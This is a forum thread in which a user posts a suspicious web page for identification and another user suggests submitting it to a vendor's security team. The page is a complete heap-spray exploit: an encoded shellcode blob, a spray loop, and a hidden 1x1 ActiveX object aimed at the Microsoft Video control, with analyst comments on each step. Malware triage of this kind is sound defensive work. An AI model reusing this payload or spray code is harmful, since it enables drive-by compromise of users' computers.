Endpoint Protection

  • 1.  discover exploit

    Posted Jul 16, 2009 11:58 AM
    Does anyone understand this code?

    ===============================================================
    <html>
    <body>

    <div id="tkj"></div>
    <script>

    // Analyst summary: this script (1) decodes a %u-escaped binary blob, (2) builds a
    // large filler string, (3) allocates 200 copies of filler + blob, and (4) creates a
    // 1x1 <object> whose classid is only known after decoding at run time.
    // Steps 1-3 match the pattern usually called heap spraying; step 4 instantiates a
    // COM/ActiveX control by CLSID. Triage cues visible here: unescape() on long %uXXXX
    // runs, string-doubling loops sized near 0xD0000, and a classid assigned from script.

    // Each %uXXXX becomes one 16-bit code unit, so this is raw binary carried in a string.
    // NOTE(review): presumably a native-code payload; its contents are not analysed here.
    var jhg = unescape("%uadb8%ue749%ud911%ud9e1%u2474%u5af4%uc92b%u63b1%u4231%u8313%u04c2%u4203%uaba2%ufa12%u71ac%uce97%ue305%u0d9e%u6c94%u67d4%u8e0f%u93ef%ua72a%u9bfb%uc8cb%u2f8c%uaeaa%u73f4%ue831%uedaf%u9050%ud4a2%ub1f7%u632b%ua7c3%ufd72%u8939%u1496%u1b98%u6f7a%u8103%u62ee%u0f24%ue074%ua7b8%u4f04%u88c8%u58d9%ub122%u3a7c%ud650%u2c73%u4294%ube4b%u5385%u5a75%ucefb%u20a6%u3173%u1090%ue561%u400f%u9f38%u366a%u3a3a%u6cd2%uc5ea%ue1f1%ue518%u9b73%u4146%u0704%u29ec%uaee6%u908a%ub214%u4ab8%u6b03%u802b%u607a%u65ce%u4f0d%ufc69%u5577%u6bd6%ua54c%u5d8e%uf936%u235c%u654a%ud2a0%u0f08%u8cb9%u6f4b%u6133%u96b4%u67e4%ucaa7%u38f3%uca2e%u3219%uc6e8%u4f58%u2db3%u6104%uefb1%ue755%ue8ff%ue4d2%ud45e%u8886%u1abe%u2b2f%ubaea%u8586%uf321%u70d1%u6978%u39f3%ub84d%u0f95%uf424%u5e3f%uacda%u6be6%ue839%uf4f4%uc189%u3fcb%u9d6f%u7f10%u5a42%u2ae1%uc6fa%u947c%u909b%u3418%ub09f%u232d%ub196%u4975%uadaa%u5879%uabbf%u615f%u06ad%u70bf%u6bc3%u58cb%u7fec%u99cf%u76e0%ubec4%uef23%ucfd4%ucc23%ud309%u7436%ucd15%u6a37%uff68%u8953%ufd8a%ua73d%u069c%u9dc0%u0c90%ue6d0%u13bb%u8eff%u3fd7%u45f5%u37d1%u696f%u6dd6%u844d%u7a06%u9f9b%u782e%u96a9%u7311%uabc7%ued75%u2040%u7ef1%ue7ab%u09d6%u80bc%u8606%u1c23%u0e35%u8d8a%ue0cb%u25b3%u8904%ub64a%u4235%u59ce%uc2a7%udc3f%u245a%u561f%u53d0%uf5c0%uc276%u9fd1%u66ef%u4e4b%u1e9f%u0ee3");

    // Double percent-encoded: the first unescape() yields the text "%u0A0A%u0A0A",
    // the second turns that text into two 16-bit code units, each 0x0A0A.
    // Two layers of encoding keep the "%u0A0A" filler pattern out of a plain-text scan.
    var kjsakdjia = "%25%75%30%41%30%41%25%75%30%41%30%41";
    var zxcvzxcj = unescape(kjsakdjia);
    var asdc = unescape(zxcvzxcj);


    // Chunk size: length of the decoded blob plus 20 code units.
    var vzxcv = 20 + jhg.length;
    // Double the filler until it is at least one chunk long.
    while (asdc.length < vzxcv) asdc += asdc;
    // vzxa: exactly one chunk of filler; xcvasd: the filler with one chunk cut off the end.
    var vzxa = asdc.substring(0,vzxcv);
    var xcvasd = asdc.substring(0,asdc.length - vzxcv);
    // Grow the filler until filler + one chunk reaches 851968 (0xD0000) code units.
    while (xcvasd.length + vzxcv < 851968) xcvasd = xcvasd + xcvasd + vzxa;

    // 200 separate large strings, each ending in the decoded blob. Holding them in an
    // array keeps every copy allocated at once. `i` is not declared, so it becomes global.
    var basd = new Array();
    for (i = 0; i < 200; i++){ basd[i] = xcvasd + jhg }

    // Build the <object> from script rather than markup, so the tag and its classid
    // do not appear in the static HTML.
    var kjghcmak=document.createElement('object');

    // Attach it to the empty <div id="tkj"> declared earlier in the page.
    document.getElementById('tkj').appendChild(kjghcmak);

    // 1x1 size: the object is effectively invisible to the person viewing the page.
    kjghcmak.width='1';

    kjghcmak.height='1';

    // Relative resource handed to the control; the file itself is not part of this post,
    // so it should be collected alongside the page when submitting a sample.
    kjghcmak.data='./a.gif';
    // Percent-encoded classid. Decoded: "clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF".
    // NOTE(review): this CLSID appears to belong to the Microsoft Video ActiveX control
    // (msvidctl.dll) — confirm against the vendor advisory and check whether the
    // kill bit for it is set on affected hosts.
    var kjv = "%63%6C%73%69%64%3A%30%39%35%35%41%43%36%32%2D%42%46%32%45%2D%34%43%42%41%2D%41%32%42%39%2D%41%36%33%46%37%37%32%44%34%36%43%46";

    kjv = unescape(kjv);

    // Assigning classid last, after data is set and the strings above are allocated,
    // is the step that asks the browser to load the control.
    kjghcmak.classid=kjv;
    </script>


    </body>
    </html>
    ===============================================================================================


  • 2.  RE: discover exploit

    Posted Jul 16, 2009 12:00 PM
    Please help me with this code.


  • 3.  RE: discover exploit

    Posted Jul 16, 2009 12:00 PM
    Please help me with this code.


  • 4.  RE: discover exploit

    Posted Jul 16, 2009 12:09 PM
    Looks like Javascript in another language. Was this code received in an email? Was a threat detected pointing to this code?

    I would submit this to the Security Response team for analysis.

    http://www.symantec.com/security_response/index.jsp